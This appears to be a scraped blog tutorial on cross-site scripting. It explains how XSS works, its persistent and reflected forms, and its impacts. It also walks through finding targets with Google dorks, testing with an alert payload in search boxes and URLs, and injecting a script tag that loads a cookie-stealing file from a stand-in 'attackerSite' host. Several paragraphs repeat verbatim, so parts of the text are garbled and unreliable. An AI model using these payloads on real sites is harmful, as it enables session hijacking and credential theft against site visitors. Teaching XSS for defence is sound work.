Cross
site scripting(XSS) is a sophisticated attack technique carried
against a user.
An
penetration tester is able to steal victim's login credentials and
even perform advanced exploitation against its web browser.
XSS
attack components
- Vulnerable Web Site
A
website vulnerable to XSS is the minimum requirement for the attack.A
website vulnerable to XSS is a website that does not filtering user
input thus allowing for HTML or javascript code to be injected into
the source code of the page through the user input.
XSS
is indeed a Web application vulnerability due to lack of sanitization
or proper user input handling.
User
input can be provided through a web form, through the parameters of a
dynamic page, cookies and HTTP headers. All these input channels
should be validated by properly implemented security functions that
should filter content when it contains malicious HTML or javascript.
<This web site is not vulnerable to XSS. It only served as an example of user input placed in the web page source code>
website
with a search box usually lets the user type the search term the
website search page will then either show the itmes found or w
warning messages informing the user that no items have been found.
As
you can see, the input from the user is taken from the search form
and then included as part of the web page, once you click the search
button.
If
the user input were not properly sanitized, a hacker could include
javascript or HTML in the search box and have that code executed.
- Victim
The
victim of a XSS attack is most of the times the user(or visitor) of a
website.
XSS
involves the injection of code within the page and therefore, when a
user is directed towards a page with malicious code, the payload
would be ran in their browser.
Often,
people view XSS as a low priority threat.
This
is because researchers usually fail to convey all the potential
damages that this vulnerability can cause.
Because
of this, programmers often forget to validate user input properly
against XSS and the users of the site are the ones who suffer many of
the time.
If
a website is vulnerable to XSS, it can be really hard for a victim to
realize that he has already fallen susceptible to an attack.
More
often than not, the payload chosen by the attacker does not involve
any visible change to the visited web page.
Many
times, it is already too late to recover from an attack, even though
one has been identified.
- Penetration tester
The
penetration tester can exploit a XSS to achieve different goals.
Let's suppose he wants to steal the cookies containing login
credentials or session ID's of the victim.
He
would then need to find a XSS in the vulnerable website.
A
penetration tester would be able to steal the cookie by means of
javascript code to be executed only from the vulnerable website for a
specific reason: only EASY.com can read victim's cookies belonging to
EASY.com : Microsoft.com cannot read the cookies of Google.com and
vice versa.
This
is called Cookie scope and in conjunction with the same origin
policy, it's an important aspect of the web application security
model.
So,
if the goal of the penetration tester is to steal cookies belonging
to the EASYcom domain, he will have to look for XSS's on EASY.com.
These
cookies will be installed in the EASY.com visitors' web browsers.
Looking
for XSS's means probing every user input taken by the web application
and understanding if that particular input channel is a good mount
point for an XSS.
XSS Vulnerability and Injection:
Step
1: Finding Vulnerable Website
As usual an attacker will search in google using the google Dork. For example, he will search for "search?q=" or "search.php?q= . This will results plenty of website. There are plenty of Google dork, hackers find their own dork and search. if you have bad luck, it will be your site.
Step 2: Testing the Vulnerability
In order to test the vulnerability, we need to find a POST or Get parameter. Confused ? It is just input fields that will be send to server. For example search query, username, password.
There are two ways to test the vulnerability:
Method 1: injection in form box(especially search box)
An attacker can enter the malicious script inside the search box and click the search button. This will lead to run the malicious script inside that website
As usual an attacker will search in google using the google Dork. For example, he will search for "search?q=" or "search.php?q= . This will results plenty of website. There are plenty of Google dork, hackers find their own dork and search. if you have bad luck, it will be your site.
Step 2: Testing the Vulnerability
In order to test the vulnerability, we need to find a POST or Get parameter. Confused ? It is just input fields that will be send to server. For example search query, username, password.
There are two ways to test the vulnerability:
Method 1: injection in form box(especially search box)
An attacker can enter the malicious script inside the search box and click the search button. This will lead to run the malicious script inside that website
Method 2: Injecting in url
In this method , there may not any form box. They use the url field instead.
For Example:
htp://vulnerablewebsite/search?q=malicious_script_goes_here
for
testing purpose, insert the
<script>alert('hi');</script>
in
the input fields.
For example:
using method 1, you can enter the code in search box and click the search button.
or
using method 2, you can enter the code in url like this:
http://vulnerablewebsite/search?q=<script>alert('hi');</script>
if it shows "Hi" message in popup box, then it is vulnerable to XSS.
step 3: Injecting Malicious Scripts
After find vulnerable site, an attacker will inject malicious scripts. It may lead to stealing cookies and malware attack as said before.
Let us assume an attacker has cookie stealing script in his website. for instance, his malicious script url is
For example:
using method 1, you can enter the code in search box and click the search button.
or
using method 2, you can enter the code in url like this:
http://vulnerablewebsite/search?q=<script>alert('hi');</script>
if it shows "Hi" message in popup box, then it is vulnerable to XSS.
step 3: Injecting Malicious Scripts
After find vulnerable site, an attacker will inject malicious scripts. It may lead to stealing cookies and malware attack as said before.
Let us assume an attacker has cookie stealing script in his website. for instance, his malicious script url is
http://attackerSite/malicious.js
He
can inject now the malcious script inside the vulnerable site like
this:
<script src=http://attackerSite/malicious.js></script>
When
visitors loads into website, the malicious start to run and cause to
cookie stealing.
Types of XSS Based on persisting capability:
There
are two types of XSS based on persisting Capability namely Persistent
and Non-Persistent.
Persistent XSS:
This is risky XSS vulnerability , it stores the data provided in server. So the malicious script injection is permanently stored in web application. It will be shown to other users when they visit the site.
if the attacker inject malware , then regular users of that website also infected .
For example:
Some sites may store the search query in order to track the user interest. This results in permanent storage of XSS.
Non-Persistent XSS:
Also referred as Reflected XSS . In this case, the storage of malicious script is temporary one(means it won't be shown to other users). Attacker may trick users to visit the URL with injection. As they are regular user of that site, they will trust the link. It leads to stealing cookies.
For example:
When you search in some site, it will return the result with your searching string. This cause to run the malicious code temporarily.
What can an attacker do with this Vulnerability?
Persistent XSS:
This is risky XSS vulnerability , it stores the data provided in server. So the malicious script injection is permanently stored in web application. It will be shown to other users when they visit the site.
if the attacker inject malware , then regular users of that website also infected .
For example:
Some sites may store the search query in order to track the user interest. This results in permanent storage of XSS.
Non-Persistent XSS:
Also referred as Reflected XSS . In this case, the storage of malicious script is temporary one(means it won't be shown to other users). Attacker may trick users to visit the URL with injection. As they are regular user of that site, they will trust the link. It leads to stealing cookies.
For example:
When you search in some site, it will return the result with your searching string. This cause to run the malicious code temporarily.
What can an attacker do with this Vulnerability?
- Stealing the Identity and Confidential Data(credit card details).
- Bypassing restriction in websites.
- Session Hijacking(Stealing session)
- Malware Attack
- Website Defacement.
Denial
of Service attacks(Dos)
Disclaimer:This
article is for educational purpose only. In order to
Pentesters/Ethical hackers understand the web application
vulnerability, this article is written. Also this article will
educate webmaster so that they can prevent them self.
Backlink- http://www.breakthesecurity.com
source: http://www.defencehacker.in
source: http://www.defencehacker.in
댓글 없음:
댓글 쓰기